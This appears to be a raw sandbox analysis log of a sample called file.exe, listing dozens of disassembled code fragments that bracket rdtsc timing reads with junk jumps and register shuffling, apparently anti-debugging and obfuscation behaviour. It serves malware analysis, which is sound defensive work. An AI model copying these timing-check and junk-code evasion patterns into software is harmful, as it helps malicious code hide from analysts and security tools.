Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71912B0 second address: 7191344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 pushfd 0x00000011 jmp 00007FC330B7B101h 0x00000016 adc eax, 131B2E06h 0x0000001c jmp 00007FC330B7B101h 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [esi+18h] 0x00000026 jmp 00007FC330B7B0FEh 0x0000002b mov dword ptr [edx+18h], eax 0x0000002e jmp 00007FC330B7B100h 0x00000033 mov eax, dword ptr [esi+1Ch] 0x00000036 jmp 00007FC330B7B100h 0x0000003b mov dword ptr [edx+1Ch], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jmp 00007FC330B7B103h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191344 second address: 7191380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC3313C0928h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191380 second address: 7191384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191384 second address: 719138A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719138A second address: 7191390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191390 second address: 7191394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191394 second address: 7191398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191398 second address: 71913B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3313C091Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71913B5 second address: 71913C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71913C4 second address: 71913FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FC3313C091Eh 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71913FB second address: 7191401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191401 second address: 719147A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0924h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c pushad 0x0000000d call 00007FC3313C091Eh 0x00000012 jmp 00007FC3313C0922h 0x00000017 pop ecx 0x00000018 pushfd 0x00000019 jmp 00007FC3313C091Bh 0x0000001e or al, 0000003Eh 0x00000021 jmp 00007FC3313C0929h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [edx+28h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC3313C091Dh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719147A second address: 71914B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3B541002h 0x00000008 mov di, 2A4Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, dword ptr [esi+2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC330B7B0FEh 0x0000001b add ax, 1798h 0x00000020 jmp 00007FC330B7B0FBh 0x00000025 popfd 0x00000026 mov bx, ax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71914B3 second address: 7191525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c pushad 0x0000000d push esi 0x0000000e mov si, di 0x00000011 pop ebx 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 mov ax, word ptr [esi+30h] 0x0000001a jmp 00007FC3313C0927h 0x0000001f mov word ptr [edx+30h], ax 0x00000023 pushad 0x00000024 mov bh, E1h 0x00000026 popad 0x00000027 mov ax, word ptr [esi+32h] 0x0000002b jmp 00007FC3313C091Ah 0x00000030 mov word ptr [edx+32h], ax 0x00000034 jmp 00007FC3313C0920h 0x00000039 mov eax, dword ptr [esi+34h] 0x0000003c pushad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191525 second address: 7191543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC330B7B101h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191543 second address: 7191564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191564 second address: 7191577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191577 second address: 719157D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719157D second address: 7191581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C041E second address: 71C0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C0424 second address: 71C0449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 58471BD9h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FC330B7B100h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C0449 second address: 71C044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C044D second address: 71C0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C0453 second address: 71C0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C0459 second address: 71C0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C0477 second address: 71C047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C047D second address: 71C04AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B102h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC330B7B107h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C04AE second address: 71C04B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71C04B3 second address: 71C04F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC330B7B105h 0x0000000a adc ax, B3F6h 0x0000000f jmp 00007FC330B7B101h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, 68665639h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170B70 second address: 7170B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170B7F second address: 7170BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC330B7B101h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FC330B7B0FCh 0x00000017 sbb cx, 7A58h 0x0000001c jmp 00007FC330B7B0FBh 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170BDA second address: 7170BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0928h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170BF6 second address: 7170BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7130065 second address: 713007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C0921h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713007A second address: 713007E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713007E second address: 71300A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC3313C0929h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71308A6 second address: 71308AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71308AA second address: 71308B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71308B0 second address: 71308C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC330B7B0FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71308C1 second address: 713091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FC3313C091Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 movzx eax, dx 0x00000015 pushfd 0x00000016 jmp 00007FC3313C0923h 0x0000001b xor al, 0000005Eh 0x0000001e jmp 00007FC3313C0929h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC3313C091Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713091E second address: 7130950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC330B7B108h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7130950 second address: 7130954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7130954 second address: 713095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170A66 second address: 7170ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FC3313C091Ah 0x0000000e adc ch, 00000058h 0x00000011 jmp 00007FC3313C091Bh 0x00000016 popfd 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FC3313C0926h 0x0000001e or ax, F1B8h 0x00000023 jmp 00007FC3313C091Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a pop ebx 0x0000002b popad 0x0000002c popad 0x0000002d push eax 0x0000002e jmp 00007FC3313C0925h 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC3313C091Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716002C second address: 7160032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7160032 second address: 7160038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7160038 second address: 716003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716003C second address: 716009F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC3313C0920h 0x00000011 mov ebp, esp 0x00000013 jmp 00007FC3313C0920h 0x00000018 and esp, FFFFFFF0h 0x0000001b jmp 00007FC3313C0920h 0x00000020 sub esp, 44h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC3313C091Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716009F second address: 71600A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71600A5 second address: 71600B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C091Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71600B6 second address: 7160126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC330B7B0FEh 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC330B7B101h 0x00000019 add cx, 7E16h 0x0000001e jmp 00007FC330B7B101h 0x00000023 popfd 0x00000024 mov cx, 9087h 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a jmp 00007FC330B7B0FAh 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FC330B7B0FAh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7160126 second address: 7160135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7160135 second address: 716019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC330B7B0FFh 0x00000009 or eax, 70C684AEh 0x0000000f jmp 00007FC330B7B109h 0x00000014 popfd 0x00000015 mov ah, 25h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov eax, 7EAC842Fh 0x00000021 mov edx, eax 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov ebx, eax 0x00000028 mov bx, si 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov dl, 63h 0x00000032 call 00007FC330B7B108h 0x00000037 pop esi 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716019F second address: 71601A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71601A5 second address: 71601C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC330B7B104h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71601C4 second address: 71601DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71601DB second address: 71601E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71601E1 second address: 71601E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71601E5 second address: 716023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B102h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov edx, esi 0x00000011 mov si, 58F9h 0x00000015 popad 0x00000016 mov dword ptr [esp+24h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FC330B7B101h 0x00000027 and cl, FFFFFFC6h 0x0000002a jmp 00007FC330B7B101h 0x0000002f popfd 0x00000030 movzx eax, bx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716023E second address: 71602F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e jmp 00007FC3313C0920h 0x00000013 jc 00007FC3A1132AE8h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC3313C091Eh 0x00000020 or ah, FFFFFFC8h 0x00000023 jmp 00007FC3313C091Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a jmp 00007FC3313C091Fh 0x0000002f pop ecx 0x00000030 popad 0x00000031 pop edi 0x00000032 jmp 00007FC3313C091Fh 0x00000037 pop esi 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FC3313C0924h 0x0000003f jmp 00007FC3313C0925h 0x00000044 popfd 0x00000045 mov ebx, ecx 0x00000047 popad 0x00000048 pop ebx 0x00000049 jmp 00007FC3313C091Ah 0x0000004e mov esp, ebp 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC3313C091Ah 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71602F3 second address: 71602F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170CD6 second address: 7170CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170CDA second address: 7170CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170CE0 second address: 7170D2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0924h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC3313C091Eh 0x00000012 and ax, 17B8h 0x00000017 jmp 00007FC3313C091Bh 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC3313C091Ch 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7170D2F second address: 7170D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7180042 second address: 7180054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C091Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7180054 second address: 7180058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7180058 second address: 718006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3313C091Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718006D second address: 718007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC330B7B0FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718007F second address: 71800D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FC3313C091Bh 0x00000015 pop ecx 0x00000016 pushfd 0x00000017 jmp 00007FC3313C0929h 0x0000001c adc eax, 2C4429A6h 0x00000022 jmp 00007FC3313C0921h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71800D4 second address: 718017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007FC330B7B103h 0x0000000b xor eax, 3545DCDEh 0x00000011 jmp 00007FC330B7B109h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d pushad 0x0000001e jmp 00007FC330B7B0FCh 0x00000023 pushfd 0x00000024 jmp 00007FC330B7B102h 0x00000029 jmp 00007FC330B7B105h 0x0000002e popfd 0x0000002f popad 0x00000030 push dword ptr [ebp+0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC330B7B103h 0x0000003c jmp 00007FC330B7B103h 0x00000041 popfd 0x00000042 mov dl, al 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718017B second address: 7180181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0012 second address: 71D0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0016 second address: 71D002B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D002B second address: 71D0047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC330B7B107h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0047 second address: 71D0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC3313C0922h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0063 second address: 71D0069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0069 second address: 71D006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D006D second address: 71D0071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
